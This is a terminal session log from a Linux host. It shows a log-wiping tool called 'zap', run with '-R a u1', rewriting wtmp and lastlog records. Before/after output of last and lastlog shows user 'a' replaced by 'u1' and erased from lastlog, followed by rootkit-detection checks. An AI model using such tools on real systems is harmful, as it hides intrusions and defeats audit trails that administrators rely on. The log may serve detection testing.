ub@ub:~/zap/zap2$ sudo ./t.sh -R a u1
75e1b87664a6a3519ec03a3535d9d3e9597c785853b82c48c85898c71ff8c9e0
+--------- check utmp before run zap -----------+
[+] Run: w
 09:38:59 up 20:45,  7 users,  load average: 1.55, 0.71, 0.47
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

[+] Run: who -all

+---------- check wtmp before run zap ----------+
[+] Run: last
a        pts/7                         Sun May  2 07:10    gone - no logout
u1       pts/6                         Sun May  2 06:10    gone - no logout
u2       pts/5                         Sun May  2 05:10    gone - no logout
a        pts/4                         Sat May  1 04:10    gone - no logout
u1       pts/3                         Sat May  1 03:10    gone - no logout
u2       pts/2                         Sat May  1 02:10    gone - no logout
u1       pts/1                         Sat May  1 01:10    gone - no logout

wtmp begins Sat May  1 01:10:53 2021

+---------- check lastlog before run zap ----------+
[+] Run: lastlog
Username         Port     From             Latest
root                                       **Never logged in**
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
nobody                                     **Never logged in**
_apt                                       **Never logged in**
u1               pts/6                     Sun May  2 06:10:53 +0000 2021
u2               pts/5                     Sun May  2 05:10:53 +0000 2021
a                pts/7                     Sun May  2 07:10:53 +0000 2021

+---------- run zap -R a u1 ----------+
[+] Run: ./zap -R a u1
Zap!

+--------- check utmp after run zap -----------+
[+] Run: w
 09:39:02 up 20:45,  7 users,  load average: 1.66, 0.75, 0.48
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

[+] Run: who -all

+---------- check wtmp after run zap ----------+
[+] Run: last
u1       pts/7                         Sun May  2 07:10    gone - no logout
u1       pts/6                         Sun May  2 06:10    gone - no logout
u2       pts/5                         Sun May  2 05:10    gone - no logout
u1       pts/4                         Sat May  1 04:10    gone - no logout
u1       pts/3                         Sat May  1 03:10    gone - no logout
u2       pts/2                         Sat May  1 02:10    gone - no logout
u1       pts/1                         Sat May  1 01:10    gone - no logout

wtmp begins Sat May  1 01:10:53 2021

+---------- check lastlog before run zap ----------+
[+] Run: lastlog
Username         Port     From             Latest
root                                       **Never logged in**
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
nobody                                     **Never logged in**
_apt                                       **Never logged in**
u1               pts/7                     Sun May  2 07:10:53 +0000 2021
u2               pts/5                     Sun May  2 05:10:53 +0000 2021
a                                          **Never logged in**

+---------- check rootkit ----------+
[+] Run: chkwtmp

[+] Run: chklastlog
